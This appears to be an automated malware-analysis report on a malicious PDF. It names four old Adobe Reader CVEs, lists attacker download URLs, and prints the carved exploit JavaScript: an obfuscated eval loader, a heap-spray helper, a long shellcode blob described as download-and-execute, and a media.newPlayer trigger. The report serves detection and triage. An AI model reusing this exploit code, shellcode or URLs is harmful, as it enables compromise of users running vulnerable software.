MALICIOUS
570
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities (CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, CVE-2008-2992). The JavaScript is designed to download a second-stage payload from the provided URLs. The embedded URLs are the primary indicators of compromise.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 12
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
ClamAV: Pdf.Exploit.Agent-36114 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Exploit.Agent-36114
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URLDecoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://pxdmx.in/x/l.php?s=printf_xa1& Referenced by PDF JavaScript
- http://pxdmx.in/x/l.php?s=email_xa1&Referenced by PDF JavaScript
- http://pxdmx.in/x/l.php?s=gicon_xa1&Referenced by PDF JavaScript
- http://pxdmx.in/x/l.php?s=newp_&Referenced by PDF JavaScript
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0008_000.js151771960743d62f8175d1b69f7772a4900d2a683db91af5ad08c0379a69a7bd |
pdf-javascript-stream | PDF /JS object 8 at offset 0x1E7 | 2687 bytes |
|
Detection
ClamAV:
Pdf.Exploit.Agent-36307
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var na_vso_vola_boga_s = "777e7".substr(4-1/*JOSCvuSGcn1*/,1);
var ctsrYIIsda77 = this;
var xx=["0","ee%xxjkjkjkkjkj","wss","9","ccc"];
var zz=xx[1].substr(3-1/*JOSCvuSGcn1*/,1);
var na_vso_vola_boga_s2 = "r"+na_vso_vola_boga_s+"p"/*JOSCvuSGcn1*/+"l"/*JOSCvuSGcn1*/+"a"/*JOSCvuSGcn1*/+"c"/*JOSCvuSGcn1*/+na_vso_vola_boga_s;
var na_vso_vola_boga_sx = "v"/*JOSCvuSGcn1*/+"z"/*JOSCvuSGcn1*/+"l";
var NVjTiobkWq17 = ctsrYIIsda77[na_vso_vola_boga_s+na_vso_vola_boga_sx[na_vso_vola_boga_s2]("z","a")];
function na_vso_vola_boga_sh999()
{
na_vso_vola_boga_sx = "u"+"njj"/*JOSCvuSGcn1*/+"jjj"/*JOSCvuSGcn1*/+"a"+"p";
}
var axzv="";
if (na_vso_vola_boga_s=="e")
var af="fu"+"ncti"+"on ";
for (jjj =/*JOSCvuSGcn1*/ 0; /*JOSCvuSGcn1*/jjj /*JOSCvuSGcn1*/< /*JOSCvuSGcn1*/999; jjj ++ )
{
if (na_vso_vola_boga_s=="e")
axzv+=af+"na_vso_vola_boga_sh"+(/*JOSCvuSGcn1*/jjj+/*JOSCvuSGcn1*/4/*JOSCvuSGcn1*/-2-/*JOSCvuSGcn1*/2)+"(){na_vso_vola_boga_sh"+(/*JOSCvuSGcn1*/jjj+/*JOSCvuSGcn1*/6-/*JOSCvuSGcn1*/3-/*JOSCvuSGcn1*/2)+"()"+/*JOSCvuSGcn1*/""+";}"/*JOSCvuSGcn1*/+""+" ";
}
NVjTiobkWq17(""+axzv+"na_vso_vola_boga_sh0"+"("+")"+";");
var jBBGWHGQwp18ro = /*JOSCvuSGcn1*/na_vso_vola_boga_sx[na_vso_vola_boga_s2](/*JOSCvuSGcn1*/"jjjjj",""+/*JOSCvuSGcn1*/"es"/*JOSCvuSGcn1*/+"c")/*JOSCvuSGcn1*/+/*JOSCvuSGcn1*/na_vso_vola_boga_s;
var jBBGWHGQwp18 = ctsrYIIsda77[jBBGWHGQwp18ro];
var fLXUFAupjS15 = /q/gi;
var na_vso_vola_boga_s4 = "q76q61q72q20q63q74q73q72q59q49q49q73q64q61q37q37q7Aq20q3Dq20q61q70q70q3Bq76q61q72q20q73q56q73q5Aq78q64q76q7Aq74q61q31q30q20q3Dq20q63q74q73q72q59q49q49q73q64q61q37q37q7Aq2Eq64q6Fq63q3Bq73q56q73q5Aq78q64q76q7Aq74q61q31q30q2Eq73q79q6Eq63q41q6Eq6Eq6Fq74q53q63q61q6Eq28q29q3Bq76q61q72q20q52q6Eq65q6Aq70q61q65q49q68q48q34q20q3Dq20q73q56q73q5Aq78q64q76q7Aq74q61q31q30q2Eq67q65q74q41q6Eq6Eq6Fq74q73q28q30q29q3Bq76q61q72q20q77q63q4Dq4Eq56q56q54q6Dq6Aq54q35q20q3Dq20q52q6Eq65q6Aq70q61q65q49q68q48q34q5Bq30q5Dq2Eq73q75q62q6Aq65q63q74q3Bq76q61q72q20q59q48q64q72q74q42q50q68q6Aq74q36q20q3Dq20q77q63q4Dq4Eq56q56q54q6Dq6Aq54q35q2Eq72q65q70q6Cq61q63q65q28q66q4Cq58q55q46q41q75q70q6Aq53q31q35q2Cq22q25q22q29q3Bq76q61q72q20q78q42q67q63q6Cq57q43q51q65q6Aq37q3Dq6Aq42q42q47q57q48q47q51q77q70q31q38q28q6Aq42q42q47q57q48q47q51q77q70q31q38q28q59q48q64q72q74q42q50q68q6Aq74q36q29q29q3Bq0Aq65q76q61q6Cq28q78q42q67q63q6Cq57q43q51q65q6Aq37q29q3B";
NVjTiobkWq17(jBBGWHGQwp18(na_vso_vola_boga_s4[na_vso_vola_boga_s2](fLXUFAupjS15,zz)));
if(dada){
function adasfdsasa(){util[dasfdsasa2](dasfdsasa, new Date());}
adasfdsasa();adasfdsasa();
try {this[dasfdsasa4][dasfdsasa3](null);} catch(e) {}
adasfdsasa();
}
|
|||
javascript_obj0008_001.js6189ed51489f687c9b667592f3ce2ff6fbae6c7effd248fdc89a7b2a9a706ee7 |
pdf-javascript-stream | PDF /JS object 8 at offset 0x209 | 183887 bytes |
|
Detection
ClamAV:
Pdf.Exploit.Agent-36307
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var na_vso_vola_boga_s = "777e7".substr(4-1/*JOSCvuSGcn1*/,1);
var ctsrYIIsda77 = this;
var xx=["0","ee%xxjkjkjkkjkj","wss","9","ccc"];
var zz=xx[1].substr(3-1/*JOSCvuSGcn1*/,1);
var na_vso_vola_boga_s2 = "r"+na_vso_vola_boga_s+"p"/*JOSCvuSGcn1*/+"l"/*JOSCvuSGcn1*/+"a"/*JOSCvuSGcn1*/+"c"/*JOSCvuSGcn1*/+na_vso_vola_boga_s;
var na_vso_vola_boga_sx = "v"/*JOSCvuSGcn1*/+"z"/*JOSCvuSGcn1*/+"l";
var NVjTiobkWq17 = ctsrYIIsda77[na_vso_vola_boga_s+na_vso_vola_boga_sx[na_vso_vola_boga_s2]("z","a")];
function na_vso_vola_boga_sh999()
{
na_vso_vola_boga_sx = "u"+"njj"/*JOSCvuSGcn1*/+"jjj"/*JOSCvuSGcn1*/+"a"+"p";
}
var axzv="";
if (na_vso_vola_boga_s=="e")
var af="fu"+"ncti"+"on ";
for (jjj =/*JOSCvuSGcn1*/ 0; /*JOSCvuSGcn1*/jjj /*JOSCvuSGcn1*/< /*JOSCvuSGcn1*/999; jjj ++ )
{
if (na_vso_vola_boga_s=="e")
axzv+=af+"na_vso_vola_boga_sh"+(/*JOSCvuSGcn1*/jjj+/*JOSCvuSGcn1*/4/*JOSCvuSGcn1*/-2-/*JOSCvuSGcn1*/2)+"(){na_vso_vola_boga_sh"+(/*JOSCvuSGcn1*/jjj+/*JOSCvuSGcn1*/6-/*JOSCvuSGcn1*/3-/*JOSCvuSGcn1*/2)+"()"+/*JOSCvuSGcn1*/""+";}"/*JOSCvuSGcn1*/+""+" ";
}
NVjTiobkWq17(""+axzv+"na_vso_vola_boga_sh0"+"("+")"+";");
var jBBGWHGQwp18ro = /*JOSCvuSGcn1*/na_vso_vola_boga_sx[na_vso_vola_boga_s2](/*JOSCvuSGcn1*/"jjjjj",""+/*JOSCvuSGcn1*/"es"/*JOSCvuSGcn1*/+"c")/*JOSCvuSGcn1*/+/*JOSCvuSGcn1*/na_vso_vola_boga_s;
var jBBGWHGQwp18 = ctsrYIIsda77[jBBGWHGQwp18ro];
var fLXUFAupjS15 = /q/gi;
var na_vso_vola_boga_s4 = "q76q61q72q20q63q74q73q72q59q49q49q73q64q61q37q37q7Aq20q3Dq20q61q70q70q3Bq76q61q72q20q73q56q73q5Aq78q64q76q7Aq74q61q31q30q20q3Dq20q63q74q73q72q59q49q49q73q64q61q37q37q7Aq2Eq64q6Fq63q3Bq73q56q73q5Aq78q64q76q7Aq74q61q31q30q2Eq73q79q6Eq63q41q6Eq6Eq6Fq74q53q63q61q6Eq28q29q3Bq76q61q72q20q52q6Eq65q6Aq70q61q65q49q68q48q34q20q3Dq20q73q56q73q5Aq78q64q76q7Aq74q61q31q30q2Eq67q65q74q41q6Eq6Eq6Fq74q73q28q30q29q3Bq76q61q72q20q77q63q4Dq4Eq56q56q54q6Dq6Aq54q35q20q3Dq20q52q6Eq65q6Aq70q61q65q49q68q48q34q5Bq30q5Dq2Eq73q75q62q6Aq65q63q74q3Bq76q61q72q20q59q48q64q72q74q42q50q68q6Aq74q36q20q3Dq20q77q63q4Dq4Eq56q56q54q6Dq6Aq54q35q2Eq72q65q70q6Cq61q63q65q28q66q4Cq58q55q46q41q75q70q6Aq53q31q35q2Cq22q25q22q29q3Bq76q61q72q20q78q42q67q63q6Cq57q43q51q65q6Aq37q3Dq6Aq42q42q47q57q48q47q51q77q70q31q38q28q6Aq42q42q47q57q48q47q51q77q70q31q38q28q59q48q64q72q74q42q50q68q6Aq74q36q29q29q3Bq0Aq65q76q61q6Cq28q78q42q67q63q6Cq57q43q51q65q6Aq37q29q3B";
NVjTiobkWq17(jBBGWHGQwp18(na_vso_vola_boga_s4[na_vso_vola_boga_s2](fLXUFAupjS15,zz)));
if(dada){
function adasfdsasa(){util[dasfdsasa2](dasfdsasa, new Date());}
adasfdsasa();adasfdsasa();
try {this[dasfdsasa4][dasfdsasa3](null);} catch(e) {}
adasfdsasa();
}
endstream
endobj
7 0 obj
<<
/Length 180891
>>
stream
q25q30q41q25q36q36q25q37q35q25q36q45q25q36q33q25q37q34q25q36q39q25q36q46q25q36q45q25q32q30q25q36q36q25q36q39q25q37q38q25q35q46q25q36q39q25q37q34q25q32q38q25q37q39q25q36q31q25q37q32q25q37q33q25q37q30q25q32q43q25q32q30q25q36q43q25q36q35q25q36q45q25q32q39q25q32q30q25q37q42q25q30q41q25q37q37q25q36q38q25q36q39q25q36q43q25q36q35q25q32q30q25q32q38q25q37q39q25q36q31q25q37q32q25q37q33q25q37q30q25q32q45q25q36q43q25q36q35q25q36q45q25q36q37q25q37q34q25q36q38q25q32q30q25q32q41q25q32q30q25q33q32q25q32q30q25q33q43q25q32q30q25q36q43q25q36q35q25q36q45q25q32q39q25q32q30q25q37q42q25q37q39q25q36q31q25q37q32q25q37q33q25q37q30q25q32q30q25q32q42q25q33q44q25q32q30q25q37q39q25q36q31q25q37q32q25q37q33q25q37q30q25q33q42q25q37q44q25q30q41q25q37q39q25q36q31q25q37q32q25q37q33q25q37q30q25q32q30q25q33q44q25q32q30q25q37q39q25q36q31q25q37q32q25q37q33q25q37q30q25q32q45q25q37q33q25q37q35q25q36q32q25q37q33q25q37q34q25q37q32q25q36q39q25q36q45q25q36q37q25q32q38q25q33q30q25q32q43q25q32q30q25q36q43q25q36q35q25q36q45q25q32q30q25q32q46q25q32q30q25q33q32q25q32q39q25q33q42q25q37q32q25q36q35q25q37q34q25q37q35q25q37q32q25q36q45q25q32q30q25q37q39q25q36q31q25q37q32q25q37q33q25q37q30q25q33q42q25q37q44q25q30q41q25q36q36q25q37q35q25q36q45q25q36q33q25q37q34q25q36q39q25q36q46q25q36q45q25q32q30q25q37q35q25q37q34q25q36q39q25q36q43q25q35q46q25q37q30q25q37q32q25q36q39q25q36q45q25q37q34q25q36
... (truncated)
|
|||
legacy_pdfkit_stage_000.jsd27d2aee1cecae463b7c86748f7e6e8de820abd20a3a619a23c769b899ca0085 |
deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0xC9A | 20099 bytes |
|
Detection
ClamAV:
Js.Exploit.Shellcode-18
Obfuscation or payload:
likely
Carved artifact contains 11 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}
function util_printf() {
var payload = unescape("%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0%u43C7%u012C%u0000%u5100%u5053%u5050%u5050%u5750%uE850%u033B%u0000%u19E8%u0000%u6400%u04A1%u0000%u8D00%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF%uE6E8%uFFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64%u15EB%u448D%u0424%uE850%uFDE4%uFFFF%uE850%u0223%u0000%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246
... (truncated)
|
|||
legacy_pdfkit_stage_001.js42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414 |
deobfuscated-js | cross-stage annotation API aliases at offset 0x1E7 | 81 bytes |
Preview scriptFirst 1,000 lines of the extracted script
media.newPlayer(null); /* alias values recovered from decoded annotation stage */ |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.